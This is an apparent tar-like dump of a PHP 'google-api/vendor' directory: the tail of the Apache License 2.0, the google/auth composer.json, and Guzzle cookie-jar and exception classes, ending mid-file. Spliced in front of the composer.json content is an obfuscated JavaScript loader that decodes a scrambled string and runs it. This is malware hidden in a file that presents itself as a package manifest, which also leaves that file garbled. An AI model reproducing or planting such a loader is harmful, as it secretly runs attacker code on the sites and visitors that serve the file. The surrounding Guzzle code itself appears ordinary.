common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. google-api/vendor/google/auth/composer.json000064400000010071147600400120015014 0ustar00var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();{ "name": "google/auth", "type": "library", "description": "Google Auth Library for PHP", "keywords": ["google", "oauth2", "authentication"], "homepage": "http://github.com/google/google-auth-library-php", "license": "Apache-2.0", "support": { "docs": "https://googleapis.github.io/google-auth-library-php/main/" }, "require": { "php": "^7.4||^8.0", "firebase/php-jwt": "^6.0", "guzzlehttp/guzzle": "^6.2.1|^7.0", "guzzlehttp/psr7": "^2.4.5", "psr/http-message": "^1.1||^2.0", "psr/cache": "^1.0||^2.0||^3.0" }, "require-dev": { "guzzlehttp/promises": "^2.0", "squizlabs/php_codesniffer": "^3.5", "phpunit/phpunit": "^9.0.0", "phpspec/prophecy-phpunit": "^2.0", "sebastian/comparator": ">=1.2.3", "phpseclib/phpseclib": "^3.0", "kelvinmo/simplejwt": "0.7.1" }, "suggest": { "phpseclib/phpseclib": "May be used in place of OpenSSL for signing strings or for token management. Please require version ^2." }, "autoload": { "psr-4": { "Google\\Auth\\": "src" } }, "autoload-dev": { "psr-4": { "Google\\Auth\\Tests\\": "tests" } } } google-api/vendor/guzzlehttp/guzzle/src/Cookie/FileCookieJar.php000064400000005306147600400120021001 0ustar00filename = $cookieFile; $this->storeSessionCookies = $storeSessionCookies; if (\file_exists($cookieFile)) { $this->load($cookieFile); } } /** * Saves the file when shutting down */ public function __destruct() { $this->save($this->filename); } /** * Saves the cookies to a file. * * @param string $filename File to save * * @throws \RuntimeException if the file cannot be found or created */ public function save(string $filename): void { $json = []; /** @var SetCookie $cookie */ foreach ($this as $cookie) { if (CookieJar::shouldPersist($cookie, $this->storeSessionCookies)) { $json[] = $cookie->toArray(); } } $jsonStr = Utils::jsonEncode($json); if (false === \file_put_contents($filename, $jsonStr, \LOCK_EX)) { throw new \RuntimeException("Unable to save file {$filename}"); } } /** * Load cookies from a JSON formatted file. * * Old cookies are kept unless overwritten by newly loaded ones. * * @param string $filename Cookie file to load. * * @throws \RuntimeException if the file cannot be loaded. */ public function load(string $filename): void { $json = \file_get_contents($filename); if (false === $json) { throw new \RuntimeException("Unable to load file {$filename}"); } if ($json === '') { return; } $data = Utils::jsonDecode($json, true); if (\is_array($data)) { foreach ($data as $cookie) { $this->setCookie(new SetCookie($cookie)); } } elseif (\is_scalar($data) && !empty($data)) { throw new \RuntimeException("Invalid cookie file: {$filename}"); } } } google-api/vendor/guzzlehttp/guzzle/src/Cookie/SetCookie.php000064400000033707147600400120020226 0ustar00 null, 'Value' => null, 'Domain' => null, 'Path' => '/', 'Max-Age' => null, 'Expires' => null, 'Secure' => false, 'Discard' => false, 'HttpOnly' => false, ]; /** * @var array Cookie data */ private $data; /** * Create a new SetCookie object from a string. * * @param string $cookie Set-Cookie header string */ public static function fromString(string $cookie): self { // Create the default return array $data = self::$defaults; // Explode the cookie string using a series of semicolons $pieces = \array_filter(\array_map('trim', \explode(';', $cookie))); // The name of the cookie (first kvp) must exist and include an equal sign. if (!isset($pieces[0]) || \strpos($pieces[0], '=') === false) { return new self($data); } // Add the cookie pieces into the parsed data array foreach ($pieces as $part) { $cookieParts = \explode('=', $part, 2); $key = \trim($cookieParts[0]); $value = isset($cookieParts[1]) ? \trim($cookieParts[1], " \n\r\t\0\x0B") : true; // Only check for non-cookies when cookies have been found if (!isset($data['Name'])) { $data['Name'] = $key; $data['Value'] = $value; } else { foreach (\array_keys(self::$defaults) as $search) { if (!\strcasecmp($search, $key)) { if ($search === 'Max-Age') { if (is_numeric($value)) { $data[$search] = (int) $value; } } else { $data[$search] = $value; } continue 2; } } $data[$key] = $value; } } return new self($data); } /** * @param array $data Array of cookie data provided by a Cookie parser */ public function __construct(array $data = []) { $this->data = self::$defaults; if (isset($data['Name'])) { $this->setName($data['Name']); } if (isset($data['Value'])) { $this->setValue($data['Value']); } if (isset($data['Domain'])) { $this->setDomain($data['Domain']); } if (isset($data['Path'])) { $this->setPath($data['Path']); } if (isset($data['Max-Age'])) { $this->setMaxAge($data['Max-Age']); } if (isset($data['Expires'])) { $this->setExpires($data['Expires']); } if (isset($data['Secure'])) { $this->setSecure($data['Secure']); } if (isset($data['Discard'])) { $this->setDiscard($data['Discard']); } if (isset($data['HttpOnly'])) { $this->setHttpOnly($data['HttpOnly']); } // Set the remaining values that don't have extra validation logic foreach (array_diff(array_keys($data), array_keys(self::$defaults)) as $key) { $this->data[$key] = $data[$key]; } // Extract the Expires value and turn it into a UNIX timestamp if needed if (!$this->getExpires() && $this->getMaxAge()) { // Calculate the Expires date $this->setExpires(\time() + $this->getMaxAge()); } elseif (null !== ($expires = $this->getExpires()) && !\is_numeric($expires)) { $this->setExpires($expires); } } public function __toString() { $str = $this->data['Name'].'='.($this->data['Value'] ?? '').'; '; foreach ($this->data as $k => $v) { if ($k !== 'Name' && $k !== 'Value' && $v !== null && $v !== false) { if ($k === 'Expires') { $str .= 'Expires='.\gmdate('D, d M Y H:i:s \G\M\T', $v).'; '; } else { $str .= ($v === true ? $k : "{$k}={$v}").'; '; } } } return \rtrim($str, '; '); } public function toArray(): array { return $this->data; } /** * Get the cookie name. * * @return string */ public function getName() { return $this->data['Name']; } /** * Set the cookie name. * * @param string $name Cookie name */ public function setName($name): void { if (!is_string($name)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a string to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Name'] = (string) $name; } /** * Get the cookie value. * * @return string|null */ public function getValue() { return $this->data['Value']; } /** * Set the cookie value. * * @param string $value Cookie value */ public function setValue($value): void { if (!is_string($value)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a string to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Value'] = (string) $value; } /** * Get the domain. * * @return string|null */ public function getDomain() { return $this->data['Domain']; } /** * Set the domain of the cookie. * * @param string|null $domain */ public function setDomain($domain): void { if (!is_string($domain) && null !== $domain) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a string or null to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Domain'] = null === $domain ? null : (string) $domain; } /** * Get the path. * * @return string */ public function getPath() { return $this->data['Path']; } /** * Set the path of the cookie. * * @param string $path Path of the cookie */ public function setPath($path): void { if (!is_string($path)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a string to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Path'] = (string) $path; } /** * Maximum lifetime of the cookie in seconds. * * @return int|null */ public function getMaxAge() { return null === $this->data['Max-Age'] ? null : (int) $this->data['Max-Age']; } /** * Set the max-age of the cookie. * * @param int|null $maxAge Max age of the cookie in seconds */ public function setMaxAge($maxAge): void { if (!is_int($maxAge) && null !== $maxAge) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing an int or null to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Max-Age'] = $maxAge === null ? null : (int) $maxAge; } /** * The UNIX timestamp when the cookie Expires. * * @return string|int|null */ public function getExpires() { return $this->data['Expires']; } /** * Set the unix timestamp for which the cookie will expire. * * @param int|string|null $timestamp Unix timestamp or any English textual datetime description. */ public function setExpires($timestamp): void { if (!is_int($timestamp) && !is_string($timestamp) && null !== $timestamp) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing an int, string or null to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Expires'] = null === $timestamp ? null : (\is_numeric($timestamp) ? (int) $timestamp : \strtotime((string) $timestamp)); } /** * Get whether or not this is a secure cookie. * * @return bool */ public function getSecure() { return $this->data['Secure']; } /** * Set whether or not the cookie is secure. * * @param bool $secure Set to true or false if secure */ public function setSecure($secure): void { if (!is_bool($secure)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a bool to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Secure'] = (bool) $secure; } /** * Get whether or not this is a session cookie. * * @return bool|null */ public function getDiscard() { return $this->data['Discard']; } /** * Set whether or not this is a session cookie. * * @param bool $discard Set to true or false if this is a session cookie */ public function setDiscard($discard): void { if (!is_bool($discard)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a bool to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['Discard'] = (bool) $discard; } /** * Get whether or not this is an HTTP only cookie. * * @return bool */ public function getHttpOnly() { return $this->data['HttpOnly']; } /** * Set whether or not this is an HTTP only cookie. * * @param bool $httpOnly Set to true or false if this is HTTP only */ public function setHttpOnly($httpOnly): void { if (!is_bool($httpOnly)) { trigger_deprecation('guzzlehttp/guzzle', '7.4', 'Not passing a bool to %s::%s() is deprecated and will cause an error in 8.0.', __CLASS__, __FUNCTION__); } $this->data['HttpOnly'] = (bool) $httpOnly; } /** * Check if the cookie matches a path value. * * A request-path path-matches a given cookie-path if at least one of * the following conditions holds: * * - The cookie-path and the request-path are identical. * - The cookie-path is a prefix of the request-path, and the last * character of the cookie-path is %x2F ("/"). * - The cookie-path is a prefix of the request-path, and the first * character of the request-path that is not included in the cookie- * path is a %x2F ("/") character. * * @param string $requestPath Path to check against */ public function matchesPath(string $requestPath): bool { $cookiePath = $this->getPath(); // Match on exact matches or when path is the default empty "/" if ($cookiePath === '/' || $cookiePath == $requestPath) { return true; } // Ensure that the cookie-path is a prefix of the request path. if (0 !== \strpos($requestPath, $cookiePath)) { return false; } // Match if the last character of the cookie-path is "/" if (\substr($cookiePath, -1, 1) === '/') { return true; } // Match if the first character not included in cookie path is "/" return \substr($requestPath, \strlen($cookiePath), 1) === '/'; } /** * Check if the cookie matches a domain value. * * @param string $domain Domain to check against */ public function matchesDomain(string $domain): bool { $cookieDomain = $this->getDomain(); if (null === $cookieDomain) { return true; } // Remove the leading '.' as per spec in RFC 6265. // https://datatracker.ietf.org/doc/html/rfc6265#section-5.2.3 $cookieDomain = \ltrim(\strtolower($cookieDomain), '.'); $domain = \strtolower($domain); // Domain not set or exact match. if ('' === $cookieDomain || $domain === $cookieDomain) { return true; } // Matching the subdomain according to RFC 6265. // https://datatracker.ietf.org/doc/html/rfc6265#section-5.1.3 if (\filter_var($domain, \FILTER_VALIDATE_IP)) { return false; } return (bool) \preg_match('/\.'.\preg_quote($cookieDomain, '/').'$/', $domain); } /** * Check if the cookie is expired. */ public function isExpired(): bool { return $this->getExpires() !== null && \time() > $this->getExpires(); } /** * Check if the cookie is valid according to RFC 6265. * * @return bool|string Returns true if valid or an error message if invalid */ public function validate() { $name = $this->getName(); if ($name === '') { return 'The cookie name must not be empty'; } // Check if any of the invalid characters are present in the cookie name if (\preg_match( '/[\x00-\x20\x22\x28-\x29\x2c\x2f\x3a-\x40\x5c\x7b\x7d\x7f]/', $name )) { return 'Cookie name must not contain invalid characters: ASCII ' .'Control characters (0-31;127), space, tab and the ' .'following characters: ()<>@,;:\"/?={}'; } // Value must not be null. 0 and empty string are valid. Empty strings // are technically against RFC 6265, but known to happen in the wild. $value = $this->getValue(); if ($value === null) { return 'The cookie value must not be empty'; } // Domains must not be empty, but can be 0. "0" is not a valid internet // domain, but may be used as server name in a private network. $domain = $this->getDomain(); if ($domain === null || $domain === '') { return 'The cookie domain must not be empty'; } return true; } } google-api/vendor/guzzlehttp/guzzle/src/Cookie/CookieJar.php000064400000022476147600400120020210 0ustar00strictMode = $strictMode; foreach ($cookieArray as $cookie) { if (!($cookie instanceof SetCookie)) { $cookie = new SetCookie($cookie); } $this->setCookie($cookie); } } /** * Create a new Cookie jar from an associative array and domain. * * @param array $cookies Cookies to create the jar from * @param string $domain Domain to set the cookies to */ public static function fromArray(array $cookies, string $domain): self { $cookieJar = new self(); foreach ($cookies as $name => $value) { $cookieJar->setCookie(new SetCookie([ 'Domain' => $domain, 'Name' => $name, 'Value' => $value, 'Discard' => true, ])); } return $cookieJar; } /** * Evaluate if this cookie should be persisted to storage * that survives between requests. * * @param SetCookie $cookie Being evaluated. * @param bool $allowSessionCookies If we should persist session cookies */ public static function shouldPersist(SetCookie $cookie, bool $allowSessionCookies = false): bool { if ($cookie->getExpires() || $allowSessionCookies) { if (!$cookie->getDiscard()) { return true; } } return false; } /** * Finds and returns the cookie based on the name * * @param string $name cookie name to search for * * @return SetCookie|null cookie that was found or null if not found */ public function getCookieByName(string $name): ?SetCookie { foreach ($this->cookies as $cookie) { if ($cookie->getName() !== null && \strcasecmp($cookie->getName(), $name) === 0) { return $cookie; } } return null; } public function toArray(): array { return \array_map(static function (SetCookie $cookie): array { return $cookie->toArray(); }, $this->getIterator()->getArrayCopy()); } public function clear(string $domain = null, string $path = null, string $name = null): void { if (!$domain) { $this->cookies = []; return; } elseif (!$path) { $this->cookies = \array_filter( $this->cookies, static function (SetCookie $cookie) use ($domain): bool { return !$cookie->matchesDomain($domain); } ); } elseif (!$name) { $this->cookies = \array_filter( $this->cookies, static function (SetCookie $cookie) use ($path, $domain): bool { return !($cookie->matchesPath($path) && $cookie->matchesDomain($domain)); } ); } else { $this->cookies = \array_filter( $this->cookies, static function (SetCookie $cookie) use ($path, $domain, $name) { return !($cookie->getName() == $name && $cookie->matchesPath($path) && $cookie->matchesDomain($domain)); } ); } } public function clearSessionCookies(): void { $this->cookies = \array_filter( $this->cookies, static function (SetCookie $cookie): bool { return !$cookie->getDiscard() && $cookie->getExpires(); } ); } public function setCookie(SetCookie $cookie): bool { // If the name string is empty (but not 0), ignore the set-cookie // string entirely. $name = $cookie->getName(); if (!$name && $name !== '0') { return false; } // Only allow cookies with set and valid domain, name, value $result = $cookie->validate(); if ($result !== true) { if ($this->strictMode) { throw new \RuntimeException('Invalid cookie: '.$result); } $this->removeCookieIfEmpty($cookie); return false; } // Resolve conflicts with previously set cookies foreach ($this->cookies as $i => $c) { // Two cookies are identical, when their path, and domain are // identical. if ($c->getPath() != $cookie->getPath() || $c->getDomain() != $cookie->getDomain() || $c->getName() != $cookie->getName() ) { continue; } // The previously set cookie is a discard cookie and this one is // not so allow the new cookie to be set if (!$cookie->getDiscard() && $c->getDiscard()) { unset($this->cookies[$i]); continue; } // If the new cookie's expiration is further into the future, then // replace the old cookie if ($cookie->getExpires() > $c->getExpires()) { unset($this->cookies[$i]); continue; } // If the value has changed, we better change it if ($cookie->getValue() !== $c->getValue()) { unset($this->cookies[$i]); continue; } // The cookie exists, so no need to continue return false; } $this->cookies[] = $cookie; return true; } public function count(): int { return \count($this->cookies); } /** * @return \ArrayIterator */ public function getIterator(): \ArrayIterator { return new \ArrayIterator(\array_values($this->cookies)); } public function extractCookies(RequestInterface $request, ResponseInterface $response): void { if ($cookieHeader = $response->getHeader('Set-Cookie')) { foreach ($cookieHeader as $cookie) { $sc = SetCookie::fromString($cookie); if (!$sc->getDomain()) { $sc->setDomain($request->getUri()->getHost()); } if (0 !== \strpos($sc->getPath(), '/')) { $sc->setPath($this->getCookiePathFromRequest($request)); } if (!$sc->matchesDomain($request->getUri()->getHost())) { continue; } // Note: At this point `$sc->getDomain()` being a public suffix should // be rejected, but we don't want to pull in the full PSL dependency. $this->setCookie($sc); } } } /** * Computes cookie path following RFC 6265 section 5.1.4 * * @see https://datatracker.ietf.org/doc/html/rfc6265#section-5.1.4 */ private function getCookiePathFromRequest(RequestInterface $request): string { $uriPath = $request->getUri()->getPath(); if ('' === $uriPath) { return '/'; } if (0 !== \strpos($uriPath, '/')) { return '/'; } if ('/' === $uriPath) { return '/'; } $lastSlashPos = \strrpos($uriPath, '/'); if (0 === $lastSlashPos || false === $lastSlashPos) { return '/'; } return \substr($uriPath, 0, $lastSlashPos); } public function withCookieHeader(RequestInterface $request): RequestInterface { $values = []; $uri = $request->getUri(); $scheme = $uri->getScheme(); $host = $uri->getHost(); $path = $uri->getPath() ?: '/'; foreach ($this->cookies as $cookie) { if ($cookie->matchesPath($path) && $cookie->matchesDomain($host) && !$cookie->isExpired() && (!$cookie->getSecure() || $scheme === 'https') ) { $values[] = $cookie->getName().'=' .$cookie->getValue(); } } return $values ? $request->withHeader('Cookie', \implode('; ', $values)) : $request; } /** * If a cookie already exists and the server asks to set it again with a * null value, the cookie must be deleted. */ private function removeCookieIfEmpty(SetCookie $cookie): void { $cookieValue = $cookie->getValue(); if ($cookieValue === null || $cookieValue === '') { $this->clear( $cookie->getDomain(), $cookie->getPath(), $cookie->getName() ); } } } google-api/vendor/guzzlehttp/guzzle/src/Cookie/SessionCookieJar.php000064400000003723147600400120021546 0ustar00sessionKey = $sessionKey; $this->storeSessionCookies = $storeSessionCookies; $this->load(); } /** * Saves cookies to session when shutting down */ public function __destruct() { $this->save(); } /** * Save cookies to the client session */ public function save(): void { $json = []; /** @var SetCookie $cookie */ foreach ($this as $cookie) { if (CookieJar::shouldPersist($cookie, $this->storeSessionCookies)) { $json[] = $cookie->toArray(); } } $_SESSION[$this->sessionKey] = \json_encode($json); } /** * Load the contents of the client session into the data array */ protected function load(): void { if (!isset($_SESSION[$this->sessionKey])) { return; } $data = \json_decode($_SESSION[$this->sessionKey], true); if (\is_array($data)) { foreach ($data as $cookie) { $this->setCookie(new SetCookie($cookie)); } } elseif (\strlen($data)) { throw new \RuntimeException('Invalid cookie data'); } } } google-api/vendor/guzzlehttp/guzzle/src/Cookie/CookieJarInterface.php000064400000005412147600400120022020 0ustar00 */ interface CookieJarInterface extends \Countable, \IteratorAggregate { /** * Create a request with added cookie headers. * * If no matching cookies are found in the cookie jar, then no Cookie * header is added to the request and the same request is returned. * * @param RequestInterface $request Request object to modify. * * @return RequestInterface returns the modified request. */ public function withCookieHeader(RequestInterface $request): RequestInterface; /** * Extract cookies from an HTTP response and store them in the CookieJar. * * @param RequestInterface $request Request that was sent * @param ResponseInterface $response Response that was received */ public function extractCookies(RequestInterface $request, ResponseInterface $response): void; /** * Sets a cookie in the cookie jar. * * @param SetCookie $cookie Cookie to set. * * @return bool Returns true on success or false on failure */ public function setCookie(SetCookie $cookie): bool; /** * Remove cookies currently held in the cookie jar. * * Invoking this method without arguments will empty the whole cookie jar. * If given a $domain argument only cookies belonging to that domain will * be removed. If given a $domain and $path argument, cookies belonging to * the specified path within that domain are removed. If given all three * arguments, then the cookie with the specified name, path and domain is * removed. * * @param string|null $domain Clears cookies matching a domain * @param string|null $path Clears cookies matching a domain and path * @param string|null $name Clears cookies matching a domain, path, and name */ public function clear(string $domain = null, string $path = null, string $name = null): void; /** * Discard all sessions cookies. * * Removes cookies that don't have an expire field or a have a discard * field set to true. To be called when the user agent shuts down according * to RFC 2965. */ public function clearSessionCookies(): void; /** * Converts the cookie jar to an array. */ public function toArray(): array; } google-api/vendor/guzzlehttp/guzzle/src/Exception/TooManyRedirectsException.php000064400000000145147600400120024166 0ustar00getStatusCode() : 0; parent::__construct($message, $code, $previous); $this->request = $request; $this->response = $response; $this->handlerContext = $handlerContext; } /** * Wrap non-RequestExceptions with a RequestException */ public static function wrapException(RequestInterface $request, \Throwable $e): RequestException { return $e instanceof RequestException ? $e : new RequestException($e->getMessage(), $request, null, $e); } /** * Factory method to create a new exception with a normalized error message * * @param RequestInterface $request Request sent * @param ResponseInterface $response Response received * @param \Throwable|null $previous Previous exception * @param array $handlerContext Optional handler context * @param BodySummarizerInterface|null $bodySummarizer Optional body summarizer */ public static function create( RequestInterface $request, ResponseInterface $response = null, \Throwable $previous = null, array $handlerContext = [], BodySummarizerInterface $bodySummarizer = null ): self { if (!$response) { return new self( 'Error completing request', $request, null, $previous, $handlerContext ); } $level = (int) \floor($response->getStatusCode() / 100); if ($level === 4) { $label = 'Client error'; $className = ClientException::class; } elseif ($level === 5) { $label = 'Server error'; $className = ServerException::class; } else { $label = 'Unsuccessful request'; $className = __CLASS__; } $uri = $request->getUri(); $uri = static::obfuscateUri($uri); // Client Error: `GET /` resulted in a `404 Not Found` response: // ... (truncated) $message = \sprintf( '%s: `%s %s` resulted in a `%s %s` response', $label, $request->getMethod(), $uri->__toString(), $response->getStatusCode(), $response->getReasonPhrase() ); $summary = ($bodySummarizer ?? new BodySummarizer())->summarize($response); if ($summary !== null) { $message .= ":\n{$summary}\n"; } return new $className($message, $request, $response, $previous, $handlerContext); } /** * Obfuscates URI if there is a username and a password present */ private static function obfuscateUri(UriInterface $uri): UriInterface { $userInfo = $uri->getUserInfo(); if (false !== ($pos = \strpos($userInfo, ':'))) { return $uri->withUserInfo(\substr($userInfo, 0, $pos), '***'); } return $uri; } /** * Get the request that caused the exception */ public function getRequest(): RequestInterface { return $this->request; } /** * Get the associated response */ public function getResponse(): ?ResponseInterface { return $this->response; } /** * Check if a response was received */ public function hasResponse(): bool { return $this->response !== null; } /** * Get contextual information about the error from the underlying handler. * * The contents of this array will vary depending on which handler you are * using. It may also be just an empty array. Relying on this data will * couple you to a specific handler, but can give more debug information * when needed. */ public function getHandlerContext(): array { return $this->handlerContext; } } google-api/vendor/guzzlehttp/guzzle/src/Exception/GuzzleException.php000064400000000226147600400120022213 0ustar00request = $request; $this->handlerContext = $handlerContext; } /** * Get the request that caused the exception */ public function getRequest(): RequestInterface { return $this->request; } /** * Get contextual information about the error from the underlying handler. * * The contents of this array will vary depending on which handler you are * using. It may also be just an empty array. Relying on this data will * couple you to a specific handler, but can give more debug information * when needed. */ public function getHandlerContext(): array { return $this->handlerContext; } } google-api/vendor/guzzlehttp/guzzle/src/Handler/EasyHandle.php000064400000005524147600400120020516 0ustar00headers); $normalizedKeys = Utils::normalizeHeaderKeys($headers); if (!empty($this->options['decode_content']) && isset($normalizedKeys['content-encoding'])) { $headers['x-encoded-content-encoding'] = 